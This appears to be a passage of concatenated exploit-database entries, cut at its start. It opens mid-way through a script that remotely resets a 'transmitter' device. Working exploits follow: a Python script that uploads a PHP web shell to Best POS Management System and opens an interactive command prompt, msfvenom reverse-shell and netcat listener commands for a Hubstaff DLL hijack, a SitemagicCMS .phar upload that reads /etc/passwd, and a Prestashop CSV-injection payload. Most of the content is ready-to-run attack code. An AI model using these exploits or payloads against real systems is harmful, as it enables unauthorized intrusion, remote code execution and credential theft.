██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
e='/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber--',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'deviceManagement',
'ssbtObj':{
'reset':'true'
}
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-1)
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
import sys
import requests
import subprocess
import time
if len(sys.argv) < 2:
print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
print("Example: %s 192.168.106.130" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
def brute_force_timestamp(timestamp_prev, ip):
progress = 0
webshell = None
for i in range(20):
for j in range(0, 1000, 20):
timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
response = requests.get(url)
if response.status_code == 200:
webshell = url
break
progress += 1
print(f"Attempt {progress}/400", end="\r")
time.sleep(0.1)
if progress >= 400:
break
if webshell or progress >= 400:
break
if webshell:
print("\033[92m[+] Webshell found:", webshell, "\033[0m")
else:
print("\033[91m[-] Webshell not found\033[0m")
return webshell
def get_unix_timestamp():
timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
return int(timestamp)
def extract_output(response_text):
start_tag = "<pre>"
end_tag = "</pre>"
start_index = response_text.find(start_tag)
end_index = response_text.find(end_tag)
if start_index != -1 and end_index != -1 and start_index < end_index:
output = response_text[start_index + len(start_tag):end_index]
return output.strip()
return None
def code_execution(webshell):
if not webshell:
print("\033[91mWebshell URI not provided\033[0m")
return
while True:
command = input("Enter command to execute (or 'exit' to quit): ")
if command == 'exit':
break
url = webshell + f"?cmd={command}"
response = requests.get(url)
output = extract_output(response.text)
if output:
print("\033[93m[+] Output:\033[0m")
print(output)
else:
print("\033[91m[-] No output received\033[0m")
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"
test@gmail.com
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"
9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''
headers = {
'Host': f"{ip}",
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
'Content-Length': str(len(data)),
'Connection': 'close'
}
timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200 and response.text == '1':
print("[+] Timestamp: %s" % timestamp_prev)
print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
webshell = brute_force_timestamp(timestamp_prev, ip)
code_execution(webshell)
else:
print("Did not worked")
*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
*#Date:* 14/05/2023
*#Exploit Author:* Ahsan Azad
*#Vendor Homepage:* https://hubstaff.com/
*#Software Link:* https://app.hubstaff.com/download
*#Version:* 1.6.13, 1.6.14
*#Tested On:* 64-bit operating system, x64-based processor
*Description*
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
in-depth reports, and more.
During testing. It was found that the system32 subdirectory was missing a
DLL library with the name *wow64log.dll* that had been required by the
hubstaff's setup file during installation. Hence, using Metasploit's
msfvenom to create a new wow64log.dll file, Tester was able to get a
reverse shell locally.
*Exploit*
1- Generate a dll file with the name wow64log.dll using the command:
*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
-o wow64log.dll*
2- Place the newly generated DLL to the *system32 *directory.
3- Start a listener on attacker's console using:
*nc -lnvp <port_used_while_generating_DLL>*
4- Launch the exe.
Reverse shell will be receive as:
*C:\Windows>*
*Attachments (For the understanding of verification team)*
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
2.png - Showing how tester was able to generate a new dll using msfvenom on
port 1337.
[image: 2.png]
3.png - Showing a reverse connection received on the attacker's console
at C:\Windows> by launching the exe.[image: 3.png]
#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. go to content then files
2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?>
3. go to http://localhost/SitemagicCMS/files/images/shell.phar
payload: <?php echo system("cat /etc/passwd"); ?>
Poc request :
POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream
<?php echo system('cat /etc/passwd'); ?>
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"
60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
Exploit Title: Prestashop 8.0.4 - CSV injection
Application: prestashop
Version: 8.0.4
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 14.05.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account then information ( http://localhost/index.php?controller=identity )
step 3. Set Email as =calc|a!z|@test.com
step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)
payload: =calc|a!z|@test.com